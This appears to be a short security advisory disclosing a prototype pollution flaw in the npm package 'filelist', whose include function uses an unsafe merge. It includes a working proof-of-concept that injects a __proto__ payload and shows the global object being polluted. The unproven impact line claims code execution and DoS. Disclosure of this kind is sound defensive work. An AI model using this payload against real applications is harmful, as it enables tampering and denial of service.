filelist

vulnerability prototype pollution
severity 8.6
language javascript
registry npm

✍️ Description

The filelist package is vulnerable to Prototype Pollution through include function, which internally uses an unsafe merge function.

🕵️‍♂️ Proof of Concept

// poc.js

const fileList = require('filelist');
const list = new fileList.FileList();
const payload = JSON.parse('{"__proto__":{"polluted":"Polluted!"}}');

console.log("Before:", {}.polluted);
list.include(payload);
console.log("After:", {}.polluted);

The execution of the PoC results in the content After: Polluted!.

💥 Impact

This vulnerability is capable of JS Code Execution, DoS, etc.

References